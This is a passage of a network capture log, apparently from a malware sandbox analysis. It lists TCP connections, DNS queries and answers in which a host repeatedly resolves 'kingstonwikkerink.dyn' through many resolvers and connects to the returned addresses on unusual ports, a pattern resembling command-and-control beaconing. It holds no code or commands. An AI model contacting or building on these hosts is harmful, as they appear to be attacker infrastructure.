Oct 26, 2024 19:18:01.858881950 CEST	2515	37010	193.233.193.45	192.168.2.13
Oct 26, 2024 19:18:01.859133005 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:01.859338045 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:06.896599054 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:06.902086973 CEST	1414	54720	91.149.218.232	192.168.2.13
Oct 26, 2024 19:18:06.902237892 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:06.902267933 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:06.907582998 CEST	1414	54720	91.149.218.232	192.168.2.13
Oct 26, 2024 19:18:06.907726049 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:06.913201094 CEST	1414	54720	91.149.218.232	192.168.2.13
Oct 26, 2024 19:18:07.747374058 CEST	1414	54720	91.149.218.232	192.168.2.13
Oct 26, 2024 19:18:07.747385979 CEST	1414	54720	91.149.218.232	192.168.2.13
Oct 26, 2024 19:18:07.747602940 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:07.747602940 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:07.747703075 CEST	54720	1414	192.168.2.13	91.149.218.232
Oct 26, 2024 19:18:12.778263092 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:12.783827066 CEST	23231	45206	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:12.783920050 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:12.783986092 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:12.789483070 CEST	23231	45206	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:12.789613962 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:12.795219898 CEST	23231	45206	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:13.608937979 CEST	23231	45206	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:13.608999014 CEST	23231	45206	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:13.609110117 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:13.609111071 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:13.609172106 CEST	45206	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:38.636482000 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:38.642128944 CEST	23231	45208	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:38.642239094 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:38.642271042 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:38.647782087 CEST	23231	45208	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:38.647841930 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:38.653207064 CEST	23231	45208	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:39.473293066 CEST	23231	45208	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:39.473520994 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:39.473520994 CEST	45208	23231	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:44.505194902 CEST	55154	10220	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:44.510670900 CEST	10220	55154	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:44.510772943 CEST	55154	10220	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:44.510819912 CEST	55154	10220	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:44.516280890 CEST	10220	55154	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:44.516350985 CEST	55154	10220	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:44.522397995 CEST	10220	55154	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:45.126701117 CEST	10220	55154	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:45.127104044 CEST	55154	10220	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:45.132466078 CEST	10220	55154	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:50.255748034 CEST	44542	4242	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:50.262132883 CEST	4242	44542	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:50.262224913 CEST	44542	4242	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:50.262249947 CEST	44542	4242	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:50.267690897 CEST	4242	44542	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:50.267759085 CEST	44542	4242	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:50.273355007 CEST	4242	44542	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:50.911016941 CEST	4242	44542	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:50.911458969 CEST	44542	4242	192.168.2.13	31.13.248.89
Oct 26, 2024 19:18:50.917196035 CEST	4242	44542	31.13.248.89	192.168.2.13
Oct 26, 2024 19:18:56.005004883 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:56.010664940 CEST	9456	39772	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:56.010782957 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:56.010821104 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:56.016175985 CEST	9456	39772	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:56.016259909 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:56.021704912 CEST	9456	39772	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:56.854207993 CEST	9456	39772	91.149.238.18	192.168.2.13
Oct 26, 2024 19:18:56.854413033 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:18:56.854506969 CEST	39772	9456	192.168.2.13	91.149.238.18
Oct 26, 2024 19:19:01.886718035 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:01.892051935 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:01.892129898 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:01.892180920 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:01.897459984 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:01.897509098 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:01.902776003 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:03.257586002 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:03.257611036 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:03.257709026 CEST	21676	57064	86.107.100.80	192.168.2.13
Oct 26, 2024 19:19:03.257781029 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:03.257781029 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:03.257829905 CEST	57064	21676	192.168.2.13	86.107.100.80
Oct 26, 2024 19:19:03.257846117 CEST	57064	21676	192.168.2.13	86.107.100.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:16:58.150033951 CEST	56340	53	192.168.2.13	51.158.108.203
Oct 26, 2024 19:16:58.166598082 CEST	53	56340	51.158.108.203	192.168.2.13
Oct 26, 2024 19:16:58.292217970 CEST	60143	53	192.168.2.13	51.158.108.203
Oct 26, 2024 19:16:58.308862925 CEST	53	60143	51.158.108.203	192.168.2.13
Oct 26, 2024 19:17:00.199693918 CEST	40896	53	192.168.2.13	1.1.1.1
Oct 26, 2024 19:17:00.199693918 CEST	57267	53	192.168.2.13	1.1.1.1
Oct 26, 2024 19:17:00.207149029 CEST	53	57267	1.1.1.1	192.168.2.13
Oct 26, 2024 19:17:00.207806110 CEST	53	40896	1.1.1.1	192.168.2.13
Oct 26, 2024 19:17:04.548800945 CEST	42735	53	192.168.2.13	137.220.52.23
Oct 26, 2024 19:17:09.552288055 CEST	43339	53	192.168.2.13	152.53.15.127
Oct 26, 2024 19:17:09.563755989 CEST	53	43339	152.53.15.127	192.168.2.13
Oct 26, 2024 19:17:15.204343081 CEST	41643	53	192.168.2.13	80.152.203.134
Oct 26, 2024 19:17:15.284214020 CEST	53	41643	80.152.203.134	192.168.2.13
Oct 26, 2024 19:17:21.183985949 CEST	52302	53	192.168.2.13	185.181.61.24
Oct 26, 2024 19:17:21.217669010 CEST	53	52302	185.181.61.24	192.168.2.13
Oct 26, 2024 19:17:26.852370024 CEST	36218	53	192.168.2.13	80.152.203.134
Oct 26, 2024 19:17:26.914787054 CEST	53	36218	80.152.203.134	192.168.2.13
Oct 26, 2024 19:17:32.849006891 CEST	43817	53	192.168.2.13	81.169.136.222
Oct 26, 2024 19:17:32.877866983 CEST	53	43817	81.169.136.222	192.168.2.13
Oct 26, 2024 19:17:39.261270046 CEST	49250	53	192.168.2.13	70.34.254.19
Oct 26, 2024 19:17:44.268318892 CEST	50921	53	192.168.2.13	217.160.70.42
Oct 26, 2024 19:17:44.295861959 CEST	53	50921	217.160.70.42	192.168.2.13
Oct 26, 2024 19:17:50.467842102 CEST	42323	53	192.168.2.13	70.34.254.19
Oct 26, 2024 19:17:55.474976063 CEST	36126	53	192.168.2.13	5.161.109.23
Oct 26, 2024 19:18:00.481061935 CEST	33294	53	192.168.2.13	202.61.197.122
Oct 26, 2024 19:18:00.492328882 CEST	53	33294	202.61.197.122	192.168.2.13
Oct 26, 2024 19:18:06.861794949 CEST	53060	53	192.168.2.13	185.181.61.24
Oct 26, 2024 19:18:06.895849943 CEST	53	53060	185.181.61.24	192.168.2.13
Oct 26, 2024 19:18:12.750184059 CEST	33526	53	192.168.2.13	65.21.1.106
Oct 26, 2024 19:18:12.777451038 CEST	53	33526	65.21.1.106	192.168.2.13
Oct 26, 2024 19:18:18.612476110 CEST	54012	53	192.168.2.13	70.34.254.19
Oct 26, 2024 19:18:23.619520903 CEST	53243	53	192.168.2.13	64.176.6.48
Oct 26, 2024 19:18:28.624051094 CEST	42632	53	192.168.2.13	178.254.22.166
Oct 26, 2024 19:18:33.630310059 CEST	52581	53	192.168.2.13	139.84.165.176
Oct 26, 2024 19:18:44.476217031 CEST	36085	53	192.168.2.13	217.160.70.42
Oct 26, 2024 19:18:44.504378080 CEST	53	36085	217.160.70.42	192.168.2.13
Oct 26, 2024 19:18:50.129755974 CEST	38660	53	192.168.2.13	80.152.203.134
Oct 26, 2024 19:18:50.254956961 CEST	53	38660	80.152.203.134	192.168.2.13
Oct 26, 2024 19:18:55.915354013 CEST	56652	53	192.168.2.13	168.235.111.72
Oct 26, 2024 19:18:56.003783941 CEST	53	56652	168.235.111.72	192.168.2.13
Oct 26, 2024 19:19:01.857541084 CEST	42659	53	192.168.2.13	217.160.70.42
Oct 26, 2024 19:19:01.885994911 CEST	53	42659	217.160.70.42	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 19:16:58.150033951 CEST	192.168.2.13	51.158.108.203	0x99b4	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:00.199693918 CEST	192.168.2.13	1.1.1.1	0x1ce0	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:00.199693918 CEST	192.168.2.13	1.1.1.1	0x4bb5	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Oct 26, 2024 19:17:04.548800945 CEST	192.168.2.13	137.220.52.23	0xf8c2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.552288055 CEST	192.168.2.13	152.53.15.127	0x2b54	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.204343081 CEST	192.168.2.13	80.152.203.134	0x4cc8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.183985949 CEST	192.168.2.13	185.181.61.24	0xb5a8	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.852370024 CEST	192.168.2.13	80.152.203.134	0x16b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.849006891 CEST	192.168.2.13	81.169.136.222	0x2748	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:39.261270046 CEST	192.168.2.13	70.34.254.19	0x17cf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.268318892 CEST	192.168.2.13	217.160.70.42	0x6b13	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:50.467842102 CEST	192.168.2.13	70.34.254.19	0xaf5a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:55.474976063 CEST	192.168.2.13	5.161.109.23	0x12a4	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.481061935 CEST	192.168.2.13	202.61.197.122	0x8ecc	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.861794949 CEST	192.168.2.13	185.181.61.24	0xb026	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.750184059 CEST	192.168.2.13	65.21.1.106	0xdb27	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:18.612476110 CEST	192.168.2.13	70.34.254.19	0x1218	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:23.619520903 CEST	192.168.2.13	64.176.6.48	0x303c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:28.624051094 CEST	192.168.2.13	178.254.22.166	0x6e10	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:33.630310059 CEST	192.168.2.13	139.84.165.176	0x890a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.476217031 CEST	192.168.2.13	217.160.70.42	0x5681	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.129755974 CEST	192.168.2.13	80.152.203.134	0xb781	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:55.915354013 CEST	192.168.2.13	168.235.111.72	0xeedd	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.857541084 CEST	192.168.2.13	217.160.70.42	0x1fea	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:16:58.166598082 CEST	51.158.108.203	192.168.2.13	0x99b4	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:00.207806110 CEST	1.1.1.1	192.168.2.13	0x1ce0	No error (0)	daisy.ubuntu.com	162.213.35.25	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:00.207806110 CEST	1.1.1.1	192.168.2.13	0x1ce0	No error (0)	daisy.ubuntu.com	162.213.35.24	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:09.563755989 CEST	152.53.15.127	192.168.2.13	0x2b54	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:15.284214020 CEST	80.152.203.134	192.168.2.13	0x4cc8	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:21.217669010 CEST	185.181.61.24	192.168.2.13	0xb5a8	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:26.914787054 CEST	80.152.203.134	192.168.2.13	0x16b	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:32.877866983 CEST	81.169.136.222	192.168.2.13	0x2748	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
